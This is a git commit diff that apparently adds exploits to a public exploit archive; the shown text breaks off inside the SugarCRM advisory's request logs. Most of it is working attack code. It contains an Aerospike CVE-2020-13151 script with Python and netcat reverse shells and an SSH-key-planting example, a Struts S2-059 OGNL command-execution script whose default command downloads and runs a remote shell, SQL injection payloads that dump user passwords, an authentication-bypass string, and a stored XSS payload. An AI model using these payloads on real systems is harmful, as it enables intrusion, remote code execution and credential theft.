DB: 2020-11-18
17 changes to exploits/shellcodes Internet Explorer 11 - Use-After-Free Microsoft Internet Explorer 11 - Use-After-Free LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption Aerospike Database 5.1.0.3 - OS Command Execution Apache Struts 2.5.20 - Double OGNL evaluation Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated) Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass SugarCRM 6.5.18 - Persistent Cross-Site Scripting WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
This commit is contained in:
parent
c7e37046e7
commit
66d1f19fa5
14 changed files with 1478 additions and 182 deletions
175
exploits/multiple/remote/49067.py
Executable file
175
exploits/multiple/remote/49067.py
Executable file
|
@ -0,0 +1,175 @@
|
|||
# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
|
||||
# Date: 2020-08-01
|
||||
# Exploit Author: Matt S
|
||||
# Vendor Homepage: https://www.aerospike.com/
|
||||
# Version: < 5.1.0.3
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE : CVE-2020-13151
|
||||
|
||||
#!/usr/bin/env python3
|
||||
import argparse
|
||||
import random
|
||||
import os, sys
|
||||
from time import sleep
|
||||
import string
|
||||
|
||||
# requires aerospike package from pip
|
||||
import aerospike
|
||||
# if this isn't installing, make sure os dependencies are met
|
||||
# sudo apt-get install python-dev
|
||||
# sudo apt-get install libssl-dev
|
||||
# sudo apt-get install python-pip
|
||||
# sudo apt-get install zlib1g-dev
|
||||
|
||||
PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&"""
|
||||
NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&'
|
||||
|
||||
def _get_client(cfg):
|
||||
try:
|
||||
return aerospike.client({
|
||||
'hosts': [(cfg.ahost, cfg.aport)],
|
||||
'policies': {'timeout': 8000}}).connect()
|
||||
|
||||
except Exception as e:
|
||||
print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
|
||||
|
||||
def _send(client, cfg, _cmd):
|
||||
try:
|
||||
print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd]))
|
||||
except Exception as e:
|
||||
print(f"[-] UDF execution returned {e.msg}")
|
||||
|
||||
def _register_udf(client, cfg):
|
||||
try:
|
||||
client.udf_put(cfg.udfpath)
|
||||
except Exception as e:
|
||||
print(f"[-] whoops, couldn't register the udf {cfg.udfpath}")
|
||||
raise e
|
||||
|
||||
def _random_string(l):
|
||||
return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)])
|
||||
|
||||
def _populate_table(client, cfg):
|
||||
ns = cfg.namespace
|
||||
setname = cfg.setname
|
||||
print(f"[+] writing to {ns}.{setname}")
|
||||
try:
|
||||
rec = cfg.dummystring
|
||||
client.put((ns, setname, rec), {'pk':cfg.dummystring})
|
||||
print(f"[+] wrote {rec}")
|
||||
except Exception as e:
|
||||
print(f"[-] unable to write record: {e.msg}")
|
||||
try:
|
||||
if e.msg.startswith('Invalid namespace'):
|
||||
print("Valid namespaces: ")
|
||||
for n in _info_parse("namespaces", client).split(";"):
|
||||
print(n.strip())
|
||||
except:
|
||||
pass
|
||||
sys.exit(13)
|
||||
|
||||
def _info_parse(k, client):
|
||||
try:
|
||||
return [i[1] for i in client.info_all(k).values() ][0]
|
||||
except Exception as e:
|
||||
print(f"error retrieving information: {e.msg}")
|
||||
return []
|
||||
|
||||
def _is_vuln(_mj, _mi, _pt, _bd):
|
||||
fixed = [5,1,0,0]
|
||||
found = [_mj, _mi, _pt, _bd]
|
||||
|
||||
if fixed == found:
|
||||
return False
|
||||
|
||||
for ix, val in enumerate(found):
|
||||
if val < fixed[ix]:
|
||||
return True
|
||||
elif val == fixed[ix]:
|
||||
pass
|
||||
else:
|
||||
return False
|
||||
|
||||
|
||||
def _version_check(client):
|
||||
print("[+] aerospike build info: ", end="")
|
||||
try:
|
||||
_ver = _info_parse("build", client)
|
||||
print(_ver)
|
||||
mj, mi, pt, bd = [int(i) for i in _ver.split('.')]
|
||||
if _is_vuln(mj, mi, pt, bd):
|
||||
print("[+] looks vulnerable")
|
||||
return
|
||||
else:
|
||||
print(f"[-] this instance is patched.")
|
||||
sys.exit(0)
|
||||
|
||||
except Exception as e:
|
||||
print(f"[+] unable to interpret build number due to {e}")
|
||||
print("[+] continuing anyway... ")
|
||||
|
||||
def _exploit(cfg):
|
||||
client = _get_client(cfg)
|
||||
|
||||
if not client:
|
||||
return
|
||||
|
||||
_version_check(client)
|
||||
|
||||
print(f"[+] populating dummy table.")
|
||||
_populate_table(client, cfg)
|
||||
|
||||
print(f"[+] registering udf")
|
||||
|
||||
_register_udf(client, cfg)
|
||||
|
||||
if cfg.pythonshell or cfg.netcatshell:
|
||||
sys.stdout.flush()
|
||||
print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
|
||||
sys.stdout.flush()
|
||||
for i in range(4):
|
||||
print(".", end="")
|
||||
sys.stdout.flush()
|
||||
sleep(1)
|
||||
|
||||
print(".")
|
||||
_send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) )
|
||||
|
||||
if cfg.cmd:
|
||||
print(f"[+] issuing command \"{cfg.cmd}\"")
|
||||
_send(client, cfg, cfg.cmd)
|
||||
|
||||
if __name__ == '__main__':
|
||||
if len(sys.argv) == 1:
|
||||
print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
|
||||
print("... or ... ")
|
||||
print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
|
||||
sys.exit(0)
|
||||
|
||||
parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC')
|
||||
|
||||
parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
|
||||
parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
|
||||
parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
|
||||
parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
|
||||
parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
|
||||
parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
|
||||
parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
|
||||
parser.add_argument("--lhost", help="host to use for reverse shell callback")
|
||||
parser.add_argument("--lport", help="port to use for reverse shell callback")
|
||||
parser.add_argument("--cmd", help="custom command to issue against the underlying host")
|
||||
parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
|
||||
|
||||
cfg = parser.parse_args()
|
||||
if not cfg.setname:
|
||||
cfg.setname = 'cve202013151'
|
||||
if not cfg.dummystring:
|
||||
cfg.dummystring = _random_string(16)
|
||||
if not cfg.udfpath:
|
||||
cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')
|
||||
|
||||
assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
|
||||
if cfg.pythonshell or cfg.netcatshell:
|
||||
assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"
|
||||
|
||||
_exploit(cfg)
|
163
exploits/multiple/remote/49068.py
Executable file
163
exploits/multiple/remote/49068.py
Executable file
|
@ -0,0 +1,163 @@
|
|||
# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation
|
||||
# Date: 08/18/2020
|
||||
# Exploit Author: West Shepherd
|
||||
# Vendor Homepage: https://struts.apache.org/download.cgi
|
||||
# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)
|
||||
# CVE : CVE-2019-0230
|
||||
# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.
|
||||
# Source(s):
|
||||
# https://github.com/PrinceFPF/CVE-2019-0230
|
||||
# https://cwiki.apache.org/confluence/display/WW/S2-059
|
||||
# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22
|
||||
|
||||
# !/usr/bin/python
|
||||
from sys import argv, exit, stdout, stderr
|
||||
import argparse
|
||||
import requests
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
import logging
|
||||
|
||||
|
||||
class Exploit:
|
||||
def __init__(
|
||||
self,
|
||||
target='',
|
||||
redirect=False,
|
||||
proxy_address=''
|
||||
):
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
self.target = target
|
||||
self.session = requests.session()
|
||||
self.redirect = redirect
|
||||
self.timeout = 0.5
|
||||
self.proxies = {
|
||||
'http': 'http://%s' % proxy_address,
|
||||
'https': 'http://%s' % proxy_address
|
||||
} \
|
||||
if proxy_address is not None \
|
||||
and proxy_address != '' else {}
|
||||
self.query_params = {}
|
||||
self.form_values = {}
|
||||
self.cookies = {}
|
||||
boundary = "---------------------------735323031399963166993862150"
|
||||
self.headers = {
|
||||
'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
|
||||
'Accept': '*/*',
|
||||
'Connection': 'close'
|
||||
}
|
||||
payload = "%{(#nike='multipart/form-data')." \
|
||||
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
|
||||
"(#_memberAccess?(#_memberAccess=#dm):" \
|
||||
|
||||
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
|
||||
\
|
||||
|
||||
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
|
||||
\
|
||||
"(#ognlUtil.getExcludedPackageNames().clear())." \
|
||||
"(#ognlUtil.getExcludedClasses().clear())." \
|
||||
"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \
|
||||
|
||||
"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
|
||||
\
|
||||
|
||||
"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
|
||||
"(#p=new
|
||||
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \
|
||||
|
||||
"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()."
|
||||
\
|
||||
|
||||
"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
|
||||
\
|
||||
"(#ros.flush())}"
|
||||
|
||||
self.payload = "--%s\r\nContent-Disposition: form-data;
|
||||
name=\"foo\"; " \
|
||||
"filename=\"%s\0b\"\r\nContent-Type:
|
||||
text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % (
|
||||
boundary, payload, boundary
|
||||
)
|
||||
|
||||
def do_get(self, url, params=None, data=None):
|
||||
return self.session.get(
|
||||
url=url,
|
||||
verify=False,
|
||||
allow_redirects=self.redirect,
|
||||
headers=self.headers,
|
||||
cookies=self.cookies,
|
||||
proxies=self.proxies,
|
||||
data=data,
|
||||
params=params
|
||||
)
|
||||
|
||||
def do_post(self, url, data=None, params=None):
|
||||
return self.session.post(
|
||||
url=url,
|
||||
data=data,
|
||||
verify=False,
|
||||
allow_redirects=self.redirect,
|
||||
headers=self.headers,
|
||||
cookies=self.cookies,
|
||||
proxies=self.proxies,
|
||||
params=params
|
||||
)
|
||||
|
||||
def debug(self):
|
||||
try:
|
||||
import http.client as http_client
|
||||
except ImportError:
|
||||
import httplib as http_client
|
||||
http_client.HTTPConnection.debuglevel = 1
|
||||
logging.basicConfig()
|
||||
logging.getLogger().setLevel(logging.DEBUG)
|
||||
requests_log = logging.getLogger("requests.packages.urllib3")
|
||||
requests_log.setLevel(logging.DEBUG)
|
||||
requests_log.propagate = True
|
||||
return self
|
||||
|
||||
def send_payload(self, command='curl --insecure -sv
|
||||
https://10.10.10.10/shell.py|python -'):
|
||||
url = self.target
|
||||
stdout.write('sending payload to %s payload %s' % (url, command))
|
||||
resp = self.do_post(url=url, params=self.query_params,
|
||||
data=self.payload.replace('{COMMAND}', command))
|
||||
return resp
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
parser = argparse.ArgumentParser(add_help=True,
|
||||
description='CVE-2020-0230 Struts
|
||||
2 exploit')
|
||||
try:
|
||||
parser.add_argument('-target', action='store', help='Target
|
||||
address: http(s)://target.com/index.action')
|
||||
parser.add_argument('-command', action='store',
|
||||
help='Command to execute: touch /tmp/pwn')
|
||||
parser.add_argument('-debug', action='store', default=False,
|
||||
help='Enable debugging: False')
|
||||
parser.add_argument('-proxy', action='store', default='',
|
||||
help='Enable proxy: 10.10.10.10:8080')
|
||||
|
||||
if len(argv) == 1:
|
||||
parser.print_help()
|
||||
exit(1)
|
||||
options = parser.parse_args()
|
||||
|
||||
exp = Exploit(
|
||||
proxy_address=options.proxy,
|
||||
target=options.target
|
||||
)
|
||||
|
||||
if options.debug:
|
||||
exp.debug()
|
||||
stdout.write('target %s debug %s proxy %s\n' % (
|
||||
options.target, options.debug, options.proxy
|
||||
))
|
||||
|
||||
result = exp.send_payload(command=options.command)
|
||||
stdout.write('Response: %d\n' % result.status_code)
|
||||
|
||||
except Exception as error:
|
||||
|
||||
stderr.write('error in main %s' % str(error))
|
|
@ -34,4 +34,32 @@ $result = mysqli_query($conn,"SELECT * FROM user WHERE id = '$user_id'");
|
|||
..
|
||||
..
|
||||
|
||||
-------------------------------
|
||||
|
||||
Vulnerable param: id
|
||||
-------------------------------------------------------------------------
|
||||
GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 163
|
||||
Origin: http://localhost
|
||||
Connection: close
|
||||
Cookie: COOKIE
|
||||
Upgrade-Insecure-Requests: 1
|
||||
-------------------------------------------------------------------------
|
||||
|
||||
Source Code: \WBS\viewbill.php
|
||||
|
||||
..
|
||||
..
|
||||
..
|
||||
$id =$_REQUEST['id'];
|
||||
$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
|
||||
..
|
||||
..
|
||||
|
||||
-------------------------------
|
|
@ -1,38 +0,0 @@
|
|||
# Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)
|
||||
# Date: 2020-11-14
|
||||
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
|
||||
# Author ID: 8763
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
|
||||
# Version: 1.0
|
||||
# Tested on: Apache2 and Windows 10
|
||||
|
||||
Vulnerable param: id
|
||||
-------------------------------------------------------------------------
|
||||
GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 163
|
||||
Origin: http://localhost
|
||||
Connection: close
|
||||
Cookie: COOKIE
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
|
||||
-------------------------------------------------------------------------
|
||||
|
||||
Source Code: \WBS\viewbill.php
|
||||
|
||||
..
|
||||
..
|
||||
..
|
||||
$id =$_REQUEST['id'];
|
||||
$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
|
||||
..
|
||||
..
|
||||
|
||||
-------------------------------
|
|
@ -29,4 +29,27 @@ booking.php:
|
|||
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);
|
||||
foreach($qry->fetch_array() as $k => $val){
|
||||
$$k=$val;
|
||||
}
|
||||
}
|
||||
|
||||
Vulnerable param: id
|
||||
-------------------------------------------------------------------------
|
||||
GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Cache-Control: max-age=0
|
||||
|
||||
|
||||
Source Code:
|
||||
|
||||
view_car.php:
|
||||
--------------------------------------------------------------------
|
||||
<?php
|
||||
if(isset($_GET['id'])){
|
||||
if(isset($_GET['id'])){
|
||||
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['id']);
|
43
exploits/php/webapps/49058.txt
Normal file
43
exploits/php/webapps/49058.txt
Normal file
|
@ -0,0 +1,43 @@
|
|||
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
|
||||
# Date: 17-11-2020
|
||||
# Exploit Author: Kislay Kumar
|
||||
# Vendor Homepage: http://egavilanmedia.com
|
||||
# Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-pane=l/
|
||||
# Version: N/A (Default)
|
||||
# Tested on: Kali Linux
|
||||
|
||||
SQL Injection:
|
||||
SQL injection is a web security vulnerability that allows an attacker
|
||||
to alter the SQL queries made to the database. This can be used to
|
||||
retrieve some sensitive information, like database structure, tables,
|
||||
columns, and their underlying data.
|
||||
|
||||
Attack Vector:
|
||||
An attacker can gain admin panel access using malicious sql injection queri=
|
||||
es.
|
||||
|
||||
Steps to reproduce:
|
||||
1. Open admin login page using following URl:
|
||||
-> http://localhost/admin/login.html
|
||||
|
||||
2. Now put below Payload in both the fields( User ID & Password)
|
||||
Payload: admin' or '1'='1
|
||||
|
||||
3. Server accepted our payload and we bypassed admin panel without any
|
||||
credentials,
|
||||
|
||||
IMPACT:
|
||||
if any attacker can gain admin panel access than they can Update &
|
||||
Delete Userdata
|
||||
|
||||
Suggested Mitigation/Remediation Actions
|
||||
Parameterized queries should be used to separate the command and data
|
||||
portions of the intended query to the database. These queries prevent
|
||||
an attacker from tampering with the query logic and extending a
|
||||
concatenated database query string. Code reviews should be conducted
|
||||
to identify any additional areas were the application or other
|
||||
applications in the organization are vulnerable to this attack.
|
||||
Additionally, input validation should be enforced on the server side
|
||||
in order to ensure that only expected data is sent in queries. Where
|
||||
possible security specific libraries should be used in order to
|
||||
provide an additional layer of protection.
|
33
exploits/php/webapps/49059.txt
Normal file
33
exploits/php/webapps/49059.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11/16/2020
|
||||
# Exploit Author: Ramil Mustafayev
|
||||
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-doctor-appointment-booking-system-php-and-mysql/
|
||||
# Software Link: https://projectworlds.in/wp-content/uploads/2020/05/PHP-Doctor-Appointment-System.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Win10 x64, Kali Linux x64
|
||||
# CVE : N/A
|
||||
######## Description ########
|
||||
#
|
||||
# An SQL injection vulnerability was discovered in PHP-Doctor-Appointment-System.
|
||||
#
|
||||
# In getuser.php file, GET parameter 'q' is vulnerable.
|
||||
#
|
||||
# The vulnerability could allow for the improper neutralization of special elements in SQL commands and may lead to the product being vulnerable to SQL injection.
|
||||
#
|
||||
#############################
|
||||
|
||||
Vulnerable code:
|
||||
|
||||
include_once 'assets/conn/dbconnect.php';
|
||||
$q = $_GET['q']; // Vulnerable param
|
||||
// echo $q;
|
||||
$res = mysqli_query($con,"SELECT * FROM doctorschedule WHERE scheduleDate='$q'"); // Injection point
|
||||
|
||||
Used Payload:
|
||||
|
||||
http://localhost/[PATH]/getuser.php?q=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20NCHAR%29%2C0x20%29%2C0x7176627871%29%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA%23
|
||||
|
||||
Output:
|
||||
|
||||
Extracted database: qbqvqdb_healthcareqvbxq
|
366
exploits/php/webapps/49060.txt
Normal file
366
exploits/php/webapps/49060.txt
Normal file
|
@ -0,0 +1,366 @@
|
|||
# Exploit Title: SugarCRM 6.5.18 - Persistent Cross-Site Scripting
|
||||
# Exploit Author: Vulnerability-Lab
|
||||
# Date: 2020-11-16
|
||||
# Vendor Homepage: https://www.sugarcrm.com
|
||||
# Version: 6.5.18
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
SugarCRM v6.5.18 - (Contacts) Persistent Cross Site Web Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2249
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2020-11-16
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2249
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.1
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
2.000€ - 3.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
SugarCRM empowers your marketing, sales and services teams to
|
||||
collaborate across the entire customer lifecycle for more
|
||||
meaningful, memorable experiences. More than 2 million users in 120
|
||||
countries have switched to SugarCRM to fuel extraordinary
|
||||
customer experiences. We have disrupted the market with a relentless
|
||||
pursuit of innovation and visionary solutions,
|
||||
bringing the world’s first no-touch, time-aware CX platform. The CX
|
||||
suite aggregates the millions of different data points
|
||||
on your customers and turns them into proactive truths, trends and
|
||||
predictions for you to leverage.
|
||||
|
||||
(Copy of the Homepage: https://www.sugarcrm.com )
|
||||
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a persistent
|
||||
cross site scripting web vulnerability in the official SugarCRM v6.5.18
|
||||
web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
SugarCRM
|
||||
Product: SugarCRM v6.5.18 - CRM (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2020-05-03: Researcher Notification & Coordination (Security Researcher)
|
||||
2020-05-04: Vendor Notification (Security Department)
|
||||
2020-05-24: Vendor Notification (Security Department)
|
||||
****-**-**: Vendor Response/Feedback (Security Department)
|
||||
****-**-**: Vendor Fix/Patch (Service Developer Team)
|
||||
****-**-**: Security Acknowledgements (Security Department)
|
||||
2020-11-16: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Guest Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Low User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Independent Security Research
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in
|
||||
the official SugarCRM v6.5.18 web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script
|
||||
codes with persistent attack vector to
|
||||
compromise browser to web-application requests from the application-side.
|
||||
|
||||
The persistent cross site web vulnerability is located in the primary
|
||||
address state and alternate address state
|
||||
input fields of the sales or support module open to create a contacts.
|
||||
Remote attackers with low privileged
|
||||
sugarcrm accounts are able to inject own malicious script code as
|
||||
contact. Higher privileged application user
|
||||
accounts will execute the script code on preview of the created contact
|
||||
to e.g gain moderator or administrator
|
||||
rights via session hijacking, phishing or further persistent
|
||||
manipulative web attacks. The code does not only
|
||||
execute in the same section were the contact is listed or previewed but
|
||||
also after save in the view log function
|
||||
context. The attack can thus way be performed via create of a contact or
|
||||
via import of a vcf file contact.
|
||||
The request method to inject is POST and the attack is limited to
|
||||
registered user accounts with default
|
||||
contact to the contacts module.
|
||||
|
||||
The script code is able to bypass the basic validation process because
|
||||
of the primary address state and alternate
|
||||
address state are exchanged in the transmit request. Normally in a
|
||||
regular transmit the context is parsed securely.
|
||||
In the actual case an attacker injects script code in the alternate
|
||||
adress when changing the main adress the wrong
|
||||
sanitized code occurs in the front-end.
|
||||
|
||||
Successful exploitation of the vulnerability results in session
|
||||
hijacking, persistent phishing attacks, persistent
|
||||
external redirects to malicious source and persistent manipulation of
|
||||
affected application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Sales
|
||||
[+] Support
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Primary Address State
|
||||
[+] Alternate Address State
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] primary address state
|
||||
[+] alternate address state
|
||||
|
||||
Affected Module(s):
|
||||
[+] Sales - Contact List
|
||||
[+] Support - Contact List
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent input validation web vulnerability can be exploited by
|
||||
remote attackers with low privileged user account and with low user
|
||||
interaction.
|
||||
For security demonstration or to reproduce the persistent cross site web
|
||||
vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Manual steps to reproduce the vulnerability ...
|
||||
1. Open the sugarcrm application
|
||||
2. Login as low privileged user account
|
||||
3. Move to sales or support and click to contact, then open create a new
|
||||
contact
|
||||
4. Inject payload in the other address and primary adress to the
|
||||
alternate address state and primary state input fields
|
||||
5. Save the entry and a refresh occurs with the inserted contact details
|
||||
Note: The script code execute immediatly after saving in the primary
|
||||
adress state and alternate adress state section of both modules
|
||||
6. Successful reproduce of the persistent cross site scripting web
|
||||
vulnerability!
|
||||
|
||||
|
||||
PoC: Payload
|
||||
><iframe src=evil.source onload=alert(document.domain)>
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
<tr><td scope="col" width="12.5%">
|
||||
Primary Address:
|
||||
</td>
|
||||
<td width="37.5%">
|
||||
<table width="100%" cellspacing="0" cellpadding="0" border="0">
|
||||
<tbody><tr>
|
||||
<td width="99%">
|
||||
<input type="hidden" class="sugar_field" id="primary_address_street"
|
||||
value="q">
|
||||
<input type="hidden" class="sugar_field" id="primary_address_city"
|
||||
value="a">
|
||||
<input type="hidden" class="sugar_field" id="primary_address_state"
|
||||
value="[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]">
|
||||
<input type="hidden" class="sugar_field" id="primary_address_country"
|
||||
value="y">
|
||||
<input type="hidden" class="sugar_field" id="primary_address_postalcode"
|
||||
value="p">
|
||||
</td><td class="dataField" width="1%">
|
||||
</td></tr>
|
||||
</tbody></table></td>
|
||||
<td scope="col" width="12.5%">
|
||||
Other Address:</td>
|
||||
<td width="37.5%">
|
||||
<table width="100%" cellspacing="0" cellpadding="0" border="0">
|
||||
<tbody><tr><td width="99%">
|
||||
<input type="hidden" class="sugar_field" id="alt_address_street" value="n">
|
||||
<input type="hidden" class="sugar_field" id="alt_address_city" value="a">
|
||||
<input type="hidden" class="sugar_field" id="alt_address_state"
|
||||
value=">"[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]">
|
||||
<input type="hidden" class="sugar_field" id="alt_address_country" value="k">
|
||||
<input type="hidden" class="sugar_field" id="alt_address_postalcode"
|
||||
value="r">
|
||||
</td>
|
||||
<td class="dataField" width="1%">
|
||||
</td>
|
||||
</tr>
|
||||
</tbody></table>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] ---
|
||||
https://sugar-crm.localhost:8000/index.php
|
||||
Host: sugar-crm.localhost:8000
|
||||
Accept:
|
||||
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
